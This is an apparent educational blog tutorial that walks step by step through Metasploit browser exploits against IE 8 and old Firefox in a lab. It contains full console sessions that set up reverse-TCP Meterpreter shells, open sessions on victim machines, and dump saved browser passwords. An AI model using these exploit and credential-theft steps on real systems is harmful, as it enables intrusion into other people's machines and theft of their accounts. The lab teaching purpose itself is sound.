03- Metasploit Basics- Attacking the Browser

When first learning about offense, students are often bewildered by the variety of different attacks that exist against a system, and often begin to believe that any system is vulnerable to anything. This changes quickly to frustration as they discover that exploits are finicky and need to be selected for the right version; moreover it seems inevitable that the target doesn’t quite have the right software.

Other students are put off by the learning curve that is Metasploit. Though it is powerful and contains many of the publicly known exploits, it does require a certain amount of knowledge to get started. There are some nice books out there- I do like Metasploit: The Penetration Tester’s Guide Paperback by Kennedy, O’Gorman, Kearns & Aharoni, but I have found this book is tough on beginners. It does a fantastic job introducing the various commands and techniques to get Metasploit running, but it never really explains which exploit is appropriate for which target, or how to select an exploit.

The purpose of this page is to provide a (very) brief introduction to the use of Metasploit as a platform to attack browsers; specifically we will learn about some attacks that target either Internet Explorer or Firefox. Why Internet Explorer? Simply, it is common, easily exploitable if patches have not been applied, but something that should not be found unpatched in the wild. Firefox may be a little less common, at least on Windows systems, but many versions of Linux ship with Firefox as their default browser.

Internet Explorer

Before attacking IE (or any other piece of software), it is important to know exactly which versions are vulnerable to which exploits. Although the current version of IE is now IE 10, it turns out that most modules target IE 8 only; there are only a few very recent ones that target IE 9. Moreover most exploits also require a version of Java 6 on the target; this is used not so much for the exploit as to provide a ROP Chain to allow shellcode to be executed. Thus, you cannot simply attack "Internet Explorer"- you need to know which version, and often need to have some other fortunate pieces of software installed on the target.

Here is a list of Metasploit modules for Internet Explorer- at least those recent modules that attack systems post-XP. Notice that none of these modules (yet) suffice against a Win 8 target.

Metasploit Modules for Internet Explorer
Using Metasploit to launch an attack

The use of all of these modules follows the same general pattern, so though I am going to demonstrate one attack, you will find that the same steps work for just about all of these modules. Let’s use the MS13-055 CAnchor attack, so start by firing up Metasploit and selecting the exploit:

       =[ metasploit v4.8.0-2013112001 [core:4.8 api:1.0]
+ -- --=[ 1220 exploits - 667 auxiliary - 191 post
+ -- --=[ 324 payloads - 30 encoders - 8 nops

msf > use exploit/windows/browser/ms13_055_canchor 
msf exploit(ms13_055_canchor) > 

If you are wondering how to determine the module name for a particular attack, check the module name on the documentation page at Rapid 7. With the exploit selected, we start by seeing what options we need to set:

msf exploit(ms13_055_canchor) > show options

Module options (exploit/windows/browser/ms13_055_canchor):

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on. This must 
                                         be an address on the local machine or 
                                         0.0.0.0
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate 
                                         (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should 
                                         be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit 
                                         (default is random)

Exploit target:

  Id  Name
  --  ----
  0   Automatic

Most of these variables are self-explanatory. The SRVHOST variable is the IP address of the server; by leaving at 0.0.0.0 we’ll bind a server to all of the IP addressed on the host. The SRVPORT variable is the port- let’s change that to port 80 just to see how to change a variable:

msf exploit(ms13_055_canchor) > set SRVPORT 80
SRVPORT => 80

Then if we check the options again, we find

msf exploit(ms13_055_canchor) > show options

Module options (exploit/windows/browser/ms13_055_canchor):

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on. This must 
                                         be an address on the local machine or 
                                         0.0.0.0
  SRVPORT     80               yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate 
                                         (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should 
                                         be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit 
                                         (default is random)

Exploit target:

  Id  Name
  --  ----
  0   Automatic

The next few variables are needed only if we want the server to use SSL; since we don’t need to do so in this simple example, let’s leave them untouched. The URIPATH variable specified the URI for the exploit. Let’s be simple, and map our exploit to the root web page

msf exploit(ms13_055_canchor) > set URIPATH /
URIPATH => /

Next we need to look at the targets. Although the module has an "automatic" setting, you should try to customize this to your target(s). To enumerate the possible targets, the show targets command is used

msf exploit(ms13_055_canchor) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   IE 8 on Windows XP SP3
   2   IE 8 on Windows 7

Then, since our target is a Windows 7 system, we can just run

msf exploit(ms13_055_canchor) > set target 2
target => 2
msf exploit(ms13_055_canchor) > show options

Module options (exploit/windows/browser/ms13_055_canchor):

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on. This must 
                                         be an address on the local machine or 
                                         0.0.0.0
  SRVPORT     80               yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate 
                                         (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should 
                                         be used (accepted: SSL2, SSL3, TLS1)
  URIPATH     /                no        The URI to use for this exploit 
                                         (default is random)
Exploit target:
  Id  Name
  --  ----
  2   IE 8 on Windows 7

Now that the targeting information is set, we need to select a payload to be delivered after a successful exploit. There are any number of reasonable payloads, but the simplest and most robust is likely the Meterpreter tool delivered via reverse TCP. Meterpreter is a powerfull remote access tool, and setting it to use reverse TCP means that he target host will connect to us (rather than the reverse), and so avoiding ingress firewall and NAT problems.

msf exploit(ms13_055_canchor) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

Once the payload is chosen, additional variables need to be set

msf exploit(ms13_055_canchor) > show options

Module options (exploit/windows/browser/ms13_055_canchor):

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on. This must 
                                         be an address on the local machine or 
                                         0.0.0.0
  SRVPORT     80               yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate 
                                         (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that 
                                         should be used (accepted: SSL2, SSL3, 
                                         TLS1)
  URIPATH     /                no        The URI to use for this exploit 
                                         (default is random)
Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
 ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process, 
                                       none
  LHOST                      yes       The listen address
  LPORT     4444             yes       The listen port
Exploit target:

  Id  Name
  --  ----
  2   IE 8 on Windows 7

The EXITFUNC variable can be left in its current state, but we must set the LHOST variable. This is the IP address of the host that our target will connect back to. If we set this to be the same as the address of our attacking system, Metasploit will set up a listener to handle the connections automatically. Since the IP address of the attacking system is 10.0.2.120

msf exploit(ms13_055_canchor) > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:25:83:4d  
          inet addr:10.0.2.130  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe25:834d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9709 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16143 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1372340 (1.3 MiB)  TX bytes:20414400 (19.4 MiB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:154379 errors:0 dropped:0 overruns:0 frame:0
          TX packets:154379 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:26313580 (25.0 MiB)  TX bytes:26313580 (25.0 MiB)

msf exploit(ms13_055_canchor) > set LHOST 10.0.2.130
LHOST => 10.0.2.130

we just change the variable as we have done before.

One last check that we have our options set correctly, then run the command exploit:

msf exploit(ms13_055_canchor) > show options

Module options (exploit/windows/browser/ms13_055_canchor):

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on. This must 
                                         be an address on the local machine or 
                                         0.0.0.0
  SRVPORT     80               yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate 
                                         (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that 
                                         should be used (accepted: SSL2, SSL3, 
                                         TLS1)
  URIPATH     /                no        The URI to use for this exploit 
                                         (default is random)
Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
 ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process, 
                                       none
  LHOST     10.0.2.130       yes       The listen address
  LPORT     4444             yes       The listen port
Exploit target:

  Id  Name
  --  ----
  2   IE 8 on Windows 7


msf exploit(ms13_055_canchor) > exploit
[*] Exploit running as background job.
msf exploit(ms13_055_canchor) > 
[*] Started reverse handler on 10.0.2.130:4444 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://10.0.2.130:80/
[*] Server started.

From this we see that we have started a background job, and that the system is now listening on 10.0.2.130:80 (and 0.0.0.0:80) for connections.

At this point, we now need our victim to browse to http://10.0.2.130 using a vulnerable version of IE. Let’s do so, with IE 8 on a Windows 7 (x64) SP 1 system. In this case, Internet Explorer will try to load the page and fail; it will then try again and fail again, leaving the user with a message
IEFail

Over on the attacking system, well, things are different:

[*] 10.0.2.129       ms13_055_canchor - Using JRE ROP
[*] 10.0.2.129       ms13_055_canchor - Sending exploit...
[*] Sending stage (769024 bytes) to 10.0.2.129
[*] 10.0.2.129       ms13_055_canchor - Using JRE ROP
[*] 10.0.2.129       ms13_055_canchor - Sending exploit...
[*] Meterpreter session 1 opened (10.0.2.130:4444 -> 10.0.2.129:49173) 
    at 2013-11-24 12:43:42 -0500
[*] Session ID 1 (10.0.2.130:4444 -> 10.0.2.129:49173) processing 
    InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2996)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2900
[*] 10.0.2.129       ms13_055_canchor - Using JRE ROP
[*] 10.0.2.129       ms13_055_canchor - Sending exploit...
[*] Sending stage (769024 bytes) to 10.0.2.129
[*] 10.0.2.129       ms13_055_canchor - Using JRE ROP
[*] 10.0.2.129       ms13_055_canchor - Sending exploit...
[+] Successfully migrated to process 
[*] Meterpreter session 2 opened (10.0.2.130:4444 -> 10.0.2.129:49176) 
    at 2013-11-24 12:43:50 -0500
[*] Session ID 2 (10.0.2.130:4444 -> 10.0.2.129:49176) processing 
    InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1956)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2064
[+] Successfully migrated to process 

Reading this, you can see that IE made two calls to the web page- one initiated by the user, and a second when the first appeared to fail. (Isn’t IE nice!)

We interact with Meterpreter in the usual fashion:

msf exploit(ms13_055_canchor) > sessions -l

Active sessions
===============

  Id  Type                   Information               Connection
  --  ----                   -----------               ----------
  1   meterpreter x86/win32  WIN7SP1\seldon @ WIN7SP1  10.0.2.130:4444 
                                            -> 10.0.2.129:49173 (10.0.2.129)
  2   meterpreter x86/win32  WIN7SP1\seldon @ WIN7SP1  10.0.2.130:4444 
                                            -> 10.0.2.129:49176 (10.0.2.129)

msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7SP1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

meterpreter > getuid
Server username: WIN7SP1\seldon

meterpreter > 

Firefox

Although there are vulnerabilities in Firefox, there are fewer than in Internet Explorer. There are two primary attack vectors that can be used against Firefox:

  • Firefox 17.0.1 Flash Privileged Code Injection
    • Firefox 17 or Firefox 17.0.1. Requires a version of Flash Player installed
    • OS: Windows, Linux, Apple
    • CVE-2013-0758
  • Firefox 5.0 – 15.0.1 __exposedProps__ XCS Code Execution
    • Firefox 5 – Firefox 15.0.1.
    • OS: Windows, Linux, Apple
    • CVE-2012-3993, CVE-2013-1710
  • Both of these are reliable, cross platform exploits. The first requires a version of Flash, but this is not uncommon; the second and older attack has no such additional requirements. There are other, less widely applicable Metasploit modules that attack Firefox: Firefox XMLSerializer Use After Free and Firefox onreadystatechange Event DocumentViewerImpl Use After Free with the first affecting Firefox 17 – 17.0.1, and the second affecting Firefox 17.0.6. The catch with these modules though, is that they only appear to work against Windows XP targets.

    These attacks follow the same template we saw in our attacks against Internet Explorer. As an example, let’s try the Firefox 5.0 – 15.0.1 __exposedProps__ XCS Code Execution against a default Mint 13 (Cinnamon); this system ships with Firefox 12 as its default unpatched browser. We start by setting up the exploit in Metasploit in the same fashion, with the same basic variables. We make two changes; first and somewhat obviously we change to a Linux specific meterpreter payload. The other change is that the exploit does need a non-null URI, so we’ll go ahead and let Metasploit choose a random URI for us.

    msf > use exploit/multi/browser/firefox_proto_crmfrequest 
    
    msf exploit(firefox_proto_crmfrequest) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(firefox_proto_crmfrequest) > show targets
    
    Exploit targets:
    
       Id  Name
       --  ----
       0   Generic (Java Payload)
       1   Windows x86 (Native Payload)
       2   Linux x86 (Native Payload)
       3   Mac OS X PPC (Native Payload)
       4   Mac OS X x86 (Native Payload)
    
    
    msf exploit(firefox_proto_crmfrequest) > set target 2
    target => 2
    msf exploit(firefox_proto_crmfrequest) > set payload linux/x86/meterpreter/rev
    erse_tcp 
    payload => linux/x86/meterpreter/reverse_tcp
    msf exploit(firefox_proto_crmfrequest) > set lhost 10.0.2.128
    lhost => 10.0.2.128
    msf exploit(firefox_proto_crmfrequest) > show options
    
    Module options (exploit/multi/browser/firefox_proto_crmfrequest):
    
     Name          Current Setting    Required  Description
     ----          ---------------    --------  -----------
     ADDONNAME     HTML5 Rendering      yes      The addon name.
                    Enhancements  
     AutoUninstall true                 yes      Automatically uninstall the addon 
                                                  after payload execution
     CONTENT                            no       Content to display inside the HTML 
                                                  .
     Retries       true                 no       Allow the browser to retry the 
                                                  module
     SRVHOST       0.0.0.0              yes      The local host to listen on. This 
                                                  must be an address on the local 
                                                  machine or 0.0.0.0
     SRVPORT       80                   yes      The local port to listen on.
     SSL           false                no       Negotiate SSL for incoming 
                                                  connections
     SSLCert                            no       Path to a custom SSL certificate 
                                                  (default is randomly generated)
     SSLVersion    SSL3                 no       Specify the version of SSL that 
                                                   should be used (accepted: 
                                                   SSL2, SSL3, TLS1)
     URIPATH                            no       The URI to use for this exploit 
                                                   (default is random)
    
    Payload options (linux/x86/meterpreter/reverse_tcp):
    
    Name          Current Setting  Required  Description
    ----          ---------------  --------  -----------
    DebugOptions  0                no        Debugging options for POSIX meterpreter
    LHOST         10.0.2.128       yes       The listen address
    LPORT         4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       2   Linux x86 (Native Payload)
    
    
    msf exploit(firefox_proto_crmfrequest) > exploit
    [*] Exploit running as background job.
    
    [*] Started reverse handler on 10.0.2.128:4444 
    [*] Using URL: http://0.0.0.0:80/VLQsmEH
    [*]  Local IP: http://10.0.2.128:80/VLQsmEH
    [*] Server started.
    

    Then, if the victim visits that page, all they see is a blank browser
    Mint13Firefox

    At the same time though, Metasploit spawns a shell for us:

    [*] 10.0.2.139       firefox_proto_crmfrequest - Gathering target information.
    [*] 10.0.2.139       firefox_proto_crmfrequest - Sending HTML
    [*] 10.0.2.139       firefox_proto_crmfrequest - Sending the malicious addon
    [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
    [*] Sending stage (1228800 bytes) to 10.0.2.139
    [*] Meterpreter session 1 opened (10.0.2.128:4444 -> 10.0.2.139:53602) at 
    2014-01-10 19:09:37 -0500
    
    msf exploit(firefox_proto_crmfrequest) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter > sysinfo
    Computer     : mint-base
    OS           : Linux mint-base 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 
    20:39:51 UTC 2012 (x86_64)
    Architecture : x86_64
    Meterpreter  : x86/linux
    meterpreter > 
    
    Now What?

    Now simply having local access to a browser does not seem that significant- but what if the user has used Firefox to log in to other privileges sites? Say the admin page for a Zen Cart installation? Is there something we could then do to grab these credentials?

    Why, yes! There is a post module just for Firefox that will gather passwords from the browser. The module has the clever name Firefox Gather Passwords from Privileged Javascript Shell and it runs like most post modules.

    To see it in use, let’s pop another browser, this time using the svg plugin attack. We’ll use a different payload here- the firefox command shell.

    msf > use exploit/multi/browser/firefox_svg_plugin 
    msf exploit(firefox_svg_plugin) > show options
    
    Module options (exploit/multi/browser/firefox_svg_plugin):
    
       Name        Current Setting  Required  Description
       ----        ---------------  --------  -----------
       CONTENT                      no        Content to display inside the HTML 
                                               <body>.
       DEBUG       false            no        Display some alert()'s for debugging 
                                               the payload.
       Retries     true             no        Allow the browser to retry the module
       SRVHOST     0.0.0.0          yes       The local host to listen on. This 
                                               must be an address on the local 
                                               machine or 0.0.0.0
       SRVPORT     8080             yes       The local port to listen on.
       SSL         false            no        Negotiate SSL for incoming 
                                               connections
       SSLCert                      no        Path to a custom SSL certificate 
                                               (default is randomly generated)
       SSLVersion  SSL3             no        Specify the version of SSL that 
                                               should be used (accepted: SSL2, 
                                               SSL3, TLS1)
       URIPATH                      no        The URI to use for this exploit 
                                               (default is random)
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Universal (Javascript XPCOM Shell)
    
    
    msf exploit(firefox_svg_plugin) > show payloads
    
    Compatible Payloads
    ===================
    
       Name                       Disclosure Date  Rank    Description
       ----                       ---------------  ----    -----------
       firefox/exec                                normal  Firefox XPCOM Execute 
                                                            Command
       firefox/shell_bind_tcp                      normal  Command Shell, Bind TCP 
                                                            (via Firefox XPCOM 
                                                            script)
       firefox/shell_reverse_tcp                   normal  Command Shell, Reverse 
                                                            TCP (via Firefox XPCOM 
                                                            script)
       generic/custom                              normal  Custom Payload
       generic/shell_bind_tcp                      normal  Generic Command Shell, 
                                                            Bind TCP Inline
       generic/shell_reverse_tcp                   normal  Generic Command Shell, 
                                                            Reverse TCP Inline
    
    msf exploit(firefox_svg_plugin) > set payload firefox/shell_reverse_tcp 
    payload => firefox/shell_reverse_tcp
    msf exploit(firefox_svg_plugin) > set lhost 10.0.1.9
    lhost => 10.0.1.9
    msf exploit(firefox_svg_plugin) > exploit -j
    [*] Exploit running as background job.
    msf exploit(firefox_svg_plugin) > 
    [*] Started reverse handler on 10.0.1.9:4444 
    [*] Using URL: http://0.0.0.0:8080/RUh2fKRSf55FQ9
    [*]  Local IP: http://10.0.1.9:8080/RUh2fKRSf55FQ9
    [*] Server started.
    
    msf exploit(firefox_svg_plugin) > 
    [*] 10.0.2.100       firefox_svg_plugin - Gathering target information.
    [*] 10.0.2.100       firefox_svg_plugin - Sending response HTML.
    [*] 10.0.2.100       firefox_svg_plugin - Target selected: Universal 
    (Javascript XPCOM Shell)
    [*] 10.0.2.100       firefox_svg_plugin - Sending Firefox 17.0.1 Flash 
    Privileged Code Injection
    [*] 10.0.2.100       firefox_svg_plugin - Sending .swf trigger.
    [*] 10.0.2.100       firefox_svg_plugin - Sending .swf trigger.
    [*] Command shell session 1 opened (10.0.1.9:4444 -> 10.0.2.100:39725) at 
    2014-05-17 17:49:57 -0400
    

    Once we have the shell, we simply run the post module to dump the credentials to a file.

    msf exploit(firefox_svg_plugin) > use post/firefox/gather/passwords 
    msf post(passwords) > show options
    
    Module options (post/firefox/gather/passwords):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION                   yes       The session to run this module on.
       TIMEOUT  90               yes       Maximum time (seconds) to wait for a  
                                            response
    
    msf post(passwords) > set session 1
    session => 1
    msf post(passwords) > run
    
    [*] Running the privileged javascript...
    [+] Saved 2 passwords to 
    /root/.msf4/loot/20140517175026_default_10.0.2.100_firefox.password_264676.bin
    [*] Post module execution completed
    

    Taking a look at the result, you will see data like

    {"password":"password1!",
    "passwordField":"passwd","username":"admin",
    "usernameField":"username","httpRealm":"",
    "formSubmitURL":"http://pollux.cosc.tu",
    "hostname":"http://pollux.cosc.tu"}
    
    {"password":"password2@","passwordField":"password",
    "username":"bob@classex.tu",
    "usernameField":"email_address","httpRealm":"",
    "formSubmitURL":"https://pollux.cosc.tu",
    "hostname":"https://pollux.cosc.tu"}
    

    I am sure you can imagine how useful this data might be….

    Now if you are just learning about Metasploit, you probably now want to know all about Meterpeter- what can we do at this point now that we have a beachhead on the target system. Well, that will have to wait for another day….

    Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: